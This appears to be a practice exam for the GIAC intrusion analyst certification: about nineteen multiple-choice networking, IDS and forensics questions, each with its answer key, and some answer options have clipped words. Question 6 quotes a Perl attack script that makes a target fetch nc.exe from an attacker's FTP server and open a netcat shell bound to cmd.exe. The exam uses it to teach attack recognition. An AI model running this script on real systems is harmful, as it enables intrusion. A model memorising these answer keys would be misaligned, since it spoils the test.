Abreast Of The Times GIAC Certified Intrusion Analyst GCIA Practice Exam

NEW QUESTION 1
You are implementing a host based intrusion detection system on your web server. You feel that the best way to monitor the web server is to find your baseline of activity (connections, traffic, etc.) and to monitor for conditions above that baseline. This type of IDS is called __________.

• A. Anomaly Based
• B. Reactive IDS
• C. Passive IDS
• D. Signature Based

Answer: A

NEW QUESTION 2
Which of the following utilities is used for decrypting WEP encryption on an 802.11b network?

• A. Wireshark
• B. NetStumbler
• C. Airsnort
• D. Kismet

Answer: C

NEW QUESTION 3
Mark works as a Network Administrator for Infonet Inc. The company has a Windows 2000 domainbased network. Mark wants to block all NNTP traffic between the network and the Internet. How will he configure the network?

• A. Disable anonymous logins in the NNTP configuration manage
• B. Block port 25 by configuring the firewal
• C. Block port 119 by configuring the firewal
• D. Block TCP port 80 by configuring the firewal

Answer: C

NEW QUESTION 4
Which of the following can be monitored by using the host intrusion detection system (HIDS)?
Each correct answer represents a complete solution. Choose two.

• A. Computer performance
• B. File system integrity
• C. Storage space on computers
• D. System files

Answer: BD

NEW QUESTION 5
Which of the following statements is true about ICMP packets?
Each correct answer represents a complete solution. Choose all that apply.

• A. The PING utility uses them to verify connectivity between two host
• B. They guarantee the delivery of datagram
• C. They are encapsulated within IP datagram
• D. They use UDP datagram
• E. They are used to report errors if a problem in IP processing occur

Answer: ACE

NEW QUESTION 6
Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl
msadc.pl -h
$host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system
("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo
bin>>sasfile\"");
system("perl
msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo get
hacked.
html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server
is
downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download
is
finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

• A. Opens up a SMTP server that requires no username or password
• B. Creates a share called "sasfile" on the target system
• C. Creates an FTP server with write permissions enabled
• D. Opens up a telnet listener that requires no username or password

Answer: D

NEW QUESTION 7
Which of the following types of firewall functions by creating two different communications, one between the client and the firewall, and the other between the firewall and the end server?

• A. Stateful firewall
• B. Proxy-based firewall
• C. Packet filter firewall
• D. Endian firewall

Answer: B

NEW QUESTION 8
Trinity wants to send an email to her friend. She uses the MD5 generator to calculate cryptographic hash of her email to ensure the security and integrity of the email. MD5 generator, which Trinity is using operates in two steps:
Creates check file
Verifies the check file
Which of the following MD5 generators is Trinity using?

• A. Secure Hash Signature Generator
• B. Mat-MD5
• C. Chaos MD5
• D. MD5 Checksum Verifier

Answer: D

NEW QUESTION 9
Adam, a malicious hacker purposely sends fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes.
On the basis of above information, which of the following types of attack is Adam attempting to perform?

• A. Fraggle attack
• B. SYN Flood attack
• C. Land attack
• D. Ping of death attack

Answer: D

NEW QUESTION 10
Which of the following are default ports for the FTP service?
Each correct answer represents a complete solution. Choose two.

• A. 80
• B. 21
• C. 20
• D. 443

Answer: BC

NEW QUESTION 11
An attacker wants to launch an attack on a wired Ethernet. He wants to accomplish the following tasks:
Sniff data frames on a local area network.
Modify the network traffic.
Stop the network traffic frequently.
Which of the following techniques will the attacker use to accomplish the task?

• A. IP spoofing
• B. Eavesdropping
• C. ARP spoofing
• D. Session hijacking

Answer: C

NEW QUESTION 12
Which of the following programs in UNIX is used to identify and fix lost blocks or orphans?

• A. File Check (fck)
• B. Block Check (bsck)
• C. Lost Block (lck)
• D. Filesystem Check (fsck)

Answer: D

NEW QUESTION 13
Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a multimedia enabled mobile phone, which is suspected to be used in a cyber crime. Adam uses a tool, with the help of which he can recover deleted text messages, photos, and call logs of the mobile phone. Which of the following tools is Adam using?

• A. FAU
• B. FTK Imager
• C. Galleta
• D. Device Seizure

Answer: D

NEW QUESTION 14
Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate and examine drive image of a compromised system, which is suspected to be used in cyber crime. Adam uses Forensic Sorter to sort the contents of hard drive in different categories. Which of the following type of image formats is NOT supported by Forensic Sorter?

• A. EnCase image file
• B. PFR image file
• C. RAW image file
• D. iso image file

Answer: D

NEW QUESTION 15
Which of the following Linux file systems is a journaled file system?

• A. ext3
• B. ext4
• C. ext2
• D. ext

Answer: A

NEW QUESTION 16
Which of the following command-line utilities is used to show the state of current TCP/IP connections?

• A. PING
• B. TRACERT
• C. NETSTAT
• D. NSLOOKUP

Answer: C

NEW QUESTION 17
Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to gather user input for a Web application. He wants to keep his program neat and simple. His chooses to use printf(str) where he should have ideally used printf("%s", str).
What attack will his program expose the Web application to?

• A. Sequence++ attack
• B. Cross Site Scripting attack
• C. Format string attack
• D. SQL injection attack

Answer: C

NEW QUESTION 18
Which of the following IPv6 transition technologies is used by the DirectAccess if a user is in a remote location and a public IPv4 address, instead of public IPv6 address, has been assigned to the computer?

• A. ISATAP
• B. PortProxy
• C. 6to4
• D. Teredo

Answer: C

NEW QUESTION 19
Which of the following types of write blocker device uses one interface for one side and a different one for the other?

• A. Pros
• B. Tailgat
• C. Indiff
• D. Native

Answer: B

NEW QUESTION 20
......